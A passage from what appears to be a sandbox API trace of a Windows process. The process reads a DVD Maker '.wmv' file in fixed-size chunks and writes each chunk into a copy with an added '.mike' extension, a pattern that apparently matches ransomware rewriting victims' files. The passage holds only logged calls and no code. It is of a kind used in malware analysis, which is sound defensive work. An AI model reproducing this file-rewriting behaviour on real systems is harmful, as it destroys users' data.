Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0063.501] SetFilePointer (in: hFile=0x288, lDistanceToMove=2549760, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x26e800 [0063.502] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0063.502] SetFilePointer (in: hFile=0x288, lDistanceToMove=2560000, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x271000 [0063.504] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0063.504] SetFilePointer (in: hFile=0x288, lDistanceToMove=2570240, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x273800 [0063.505] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0063.506] SetFilePointer (in: hFile=0x288, lDistanceToMove=2580480, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x276000 [0063.507] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0063.507] SetFilePointer (in: hFile=0x288, lDistanceToMove=2590720, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x278800 [0063.508] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0063.509] SetFilePointer (in: hFile=0x288, lDistanceToMove=2600960, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x27b000 [0063.510] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0063.510] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.511] GetFileType (hFile=0x288) returned 0x1 [0063.511] GetFileType (hFile=0x288) returned 0x1 [0063.511] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x27b220 [0063.511] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0063.511] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.511] GetFileType (hFile=0x288) returned 0x1 [0063.512] GetFileType (hFile=0x288) returned 0x1 [0063.512] SetFilePointer (in: hFile=0x288, lDistanceToMove=2611200, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x27d800 [0063.512] ReadFile (in: hFile=0x288, lpBuffer=0x21c6e64, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21c6e64*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0063.513] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0063.513] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.513] GetFileType (hFile=0x288) returned 0x1 [0063.513] GetFileType (hFile=0x288) returned 0x1 [0063.513] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x27da20 [0063.515] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0063.515] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.515] GetFileType (hFile=0x288) returned 0x1 [0063.515] GetFileType (hFile=0x288) returned 0x1 [0063.515] SetFilePointer (in: hFile=0x288, lDistanceToMove=2621440, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x280000 [0063.515] ReadFile (in: hFile=0x288, lpBuffer=0x21d3e94, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21d3e94*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0063.517] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0063.517] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.517] GetFileType (hFile=0x288) returned 0x1 [0063.517] GetFileType (hFile=0x288) returned 0x1 [0063.517] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x280220 [0063.517] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0063.517] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.517] GetFileType (hFile=0x288) returned 0x1 [0063.518] GetFileType (hFile=0x288) returned 0x1 [0063.518] SetFilePointer (in: hFile=0x288, lDistanceToMove=2631680, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x282800 [0063.518] ReadFile (in: hFile=0x288, lpBuffer=0x21e0ec4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21e0ec4*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0063.519] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0063.519] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.519] GetFileType (hFile=0x288) returned 0x1 [0063.519] GetFileType (hFile=0x288) returned 0x1 [0063.519] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x282a20 [0063.519] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0063.519] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.520] GetFileType (hFile=0x288) returned 0x1 [0063.520] GetFileType (hFile=0x288) returned 0x1 [0063.520] SetFilePointer (in: hFile=0x288, lDistanceToMove=2641920, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x285000 [0063.520] ReadFile (in: hFile=0x288, lpBuffer=0x21edef4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21edef4*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0063.521] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0063.521] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.521] GetFileType (hFile=0x288) returned 0x1 [0063.521] GetFileType (hFile=0x288) returned 0x1 [0063.521] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x285220 [0063.522] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0063.522] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.522] GetFileType (hFile=0x288) returned 0x1 [0063.522] GetFileType (hFile=0x288) returned 0x1 [0063.522] SetFilePointer (in: hFile=0x288, lDistanceToMove=2652160, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x287800 [0063.522] ReadFile (in: hFile=0x288, lpBuffer=0x21faf24, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21faf24*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0063.523] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0063.523] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.523] GetFileType (hFile=0x288) returned 0x1 [0063.523] GetFileType (hFile=0x288) returned 0x1 [0063.523] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x287a20 [0063.524] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0063.524] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.524] GetFileType (hFile=0x288) returned 0x1 [0063.524] GetFileType (hFile=0x288) returned 0x1 [0063.524] SetFilePointer (in: hFile=0x288, lDistanceToMove=2662400, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x28a000 [0063.524] ReadFile (in: hFile=0x288, lpBuffer=0x2207f54, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2207f54*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0063.525] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0063.526] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.526] GetFileType (hFile=0x288) returned 0x1 [0063.526] GetFileType (hFile=0x288) returned 0x1 [0063.526] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x28a220 [0063.526] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0063.526] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.526] GetFileType (hFile=0x288) returned 0x1 [0063.527] GetFileType (hFile=0x288) returned 0x1 [0063.527] SetFilePointer (in: hFile=0x288, lDistanceToMove=2672640, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x28c800 [0063.527] ReadFile (in: hFile=0x288, lpBuffer=0x2214f84, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2214f84*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0063.528] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0063.528] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.528] GetFileType (hFile=0x288) returned 0x1 [0063.528] GetFileType (hFile=0x288) returned 0x1 [0063.528] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x28ca20 [0063.529] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0063.529] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.529] GetFileType (hFile=0x288) returned 0x1 [0063.529] GetFileType (hFile=0x288) returned 0x1 [0063.529] SetFilePointer (in: hFile=0x288, lDistanceToMove=2682880, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x28f000 [0063.529] ReadFile (in: hFile=0x288, lpBuffer=0x2221fb4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2221fb4*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0063.530] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0063.530] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.530] GetFileType (hFile=0x288) returned 0x1 [0063.530] GetFileType (hFile=0x288) returned 0x1 [0063.530] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x28f220 [0063.531] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0063.531] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.531] GetFileType (hFile=0x288) returned 0x1 [0063.531] GetFileType (hFile=0x288) returned 0x1 [0063.531] SetFilePointer (in: hFile=0x288, lDistanceToMove=2693120, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x291800 [0063.531] ReadFile (in: hFile=0x288, lpBuffer=0x222efe4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x222efe4*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0063.532] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0063.532] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.533] GetFileType (hFile=0x288) returned 0x1 [0063.533] GetFileType (hFile=0x288) returned 0x1 [0063.533] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x291a20 [0063.533] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0063.533] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.533] GetFileType (hFile=0x288) returned 0x1 [0063.533] GetFileType (hFile=0x288) returned 0x1 [0063.533] SetFilePointer (in: hFile=0x288, lDistanceToMove=2703360, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x294000 [0063.533] ReadFile (in: hFile=0x288, lpBuffer=0x223c014, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x223c014*, 